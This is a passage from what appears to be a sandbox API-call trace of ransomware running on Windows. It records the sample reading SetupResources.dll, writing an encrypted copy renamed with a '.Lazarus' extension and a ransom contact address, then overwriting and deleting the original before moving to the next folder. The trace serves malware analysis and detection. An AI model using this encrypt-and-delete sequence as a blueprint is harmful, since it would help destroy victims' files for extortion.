(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.568] AreFileApisANSI () returned 1 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0068.568] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58)) returned 1 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.568] AreFileApisANSI () returned 1 [0068.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.568] GetLastError () returned 0x0 [0068.568] SetLastError (dwErrCode=0x0) [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e458 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0068.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0068.569] GetLastError () returned 0x0 [0068.569] SetLastError (dwErrCode=0x0) [0068.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0068.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0068.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0068.569] AreFileApisANSI () returned 1 [0068.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0068.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0068.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0068.569] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.570] GetFileType (hFile=0x420) returned 0x1 [0068.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0068.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0068.570] AreFileApisANSI () returned 1 [0068.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0068.570] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.570] GetFileType (hFile=0x410) returned 0x1 [0068.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0068.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.571] GetLastError () returned 0x0 [0068.571] SetLastError (dwErrCode=0x0) [0068.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.571] GetLastError () returned 0x0 [0068.571] SetLastError (dwErrCode=0x0) [0068.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0068.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.571] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0068.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0068.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0068.574] GetLastError () returned 0x0 [0068.574] SetLastError (dwErrCode=0x0) [0068.574] GetLastError () returned 0x0 [0068.574] SetLastError (dwErrCode=0x0) [0068.574] GetLastError () returned 0x0 [0068.574] SetLastError (dwErrCode=0x0) [0068.574] GetLastError () returned 0x0 [0068.574] SetLastError (dwErrCode=0x0) [0068.574] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.575] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.576] GetLastError () returned 0x0 [0068.576] SetLastError (dwErrCode=0x0) [0068.576] GetLastError () returned 0x0 [0068.576] SetLastError (dwErrCode=0x0) [0068.576] GetLastError () returned 0x0 [0068.576] SetLastError (dwErrCode=0x0) [0068.576] GetLastError () returned 0x0 [0068.576] SetLastError (dwErrCode=0x0) [0068.576] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.577] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.577] GetLastError () returned 0x0 [0068.577] SetLastError (dwErrCode=0x0) [0068.577] GetLastError () returned 0x0 [0068.577] SetLastError (dwErrCode=0x0) [0068.577] GetLastError () returned 0x0 [0068.577] SetLastError (dwErrCode=0x0) [0068.577] GetLastError () returned 0x0 [0068.577] SetLastError (dwErrCode=0x0) [0068.577] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0xb58, lpOverlapped=0x0) returned 1 [0068.578] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.578] GetLastError () returned 0x0 [0068.578] SetLastError (dwErrCode=0x0) [0068.578] GetLastError () returned 0x0 [0068.578] SetLastError (dwErrCode=0x0) [0068.578] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.578] GetLastError () returned 0x0 [0068.578] SetLastError (dwErrCode=0x0) [0068.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0068.578] GetLastError () returned 0x0 [0068.578] SetLastError (dwErrCode=0x0) [0068.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0068.579] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xb60, lpOverlapped=0x0) returned 1 [0068.579] GetLastError () returned 0x0 [0068.579] SetLastError (dwErrCode=0x0) [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.579] GetLastError () returned 0x0 [0068.579] SetLastError (dwErrCode=0x0) [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0068.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0068.579] CloseHandle (hObject=0x420) returned 1 [0068.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.581] CloseHandle (hObject=0x410) returned 1 [0068.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.581] AreFileApisANSI () returned 1 [0068.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0068.581] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.582] GetFileType (hFile=0x410) returned 0x1 [0068.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.583] GetLastError () returned 0xb7 [0068.583] SetLastError (dwErrCode=0xb7) [0068.583] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.584] CloseHandle (hObject=0x410) returned 1 [0068.584] AreFileApisANSI () returned 1 [0068.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0068.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0068.584] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.585] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ƿ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧臐\x07̧비聐莈\x08賂̧")) returned 0 [0068.586] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0068.586] AreFileApisANSI () returned 1 [0068.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043", lpUsedDefaultChar=0x0) returned 27 [0068.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.587] AreFileApisANSI () returned 1 [0068.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0068.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x77f90 [0068.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x77f90, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043") returned 27 [0068.587] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043" (normalized: "c:\\588bce7c90097ed212\\1043"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.587] GetLastError () returned 0x5 [0068.587] GetLastError () returned 0x5 [0068.587] SetLastError (dwErrCode=0x5) [0068.587] GetLastError () returned 0x5 [0068.587] SetLastError (dwErrCode=0x5) [0068.587] GetLastError () returned 0x5 [0068.587] SetLastError (dwErrCode=0x5) [0068.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x77f90 | out: hHeap=0x20000) returned 1 [0068.587] AreFileApisANSI () returned 1 [0068.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0068.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78490 [0068.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78490, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043") returned 27 [0068.587] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043" (normalized: "c:\\588bce7c90097ed212\\1043"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 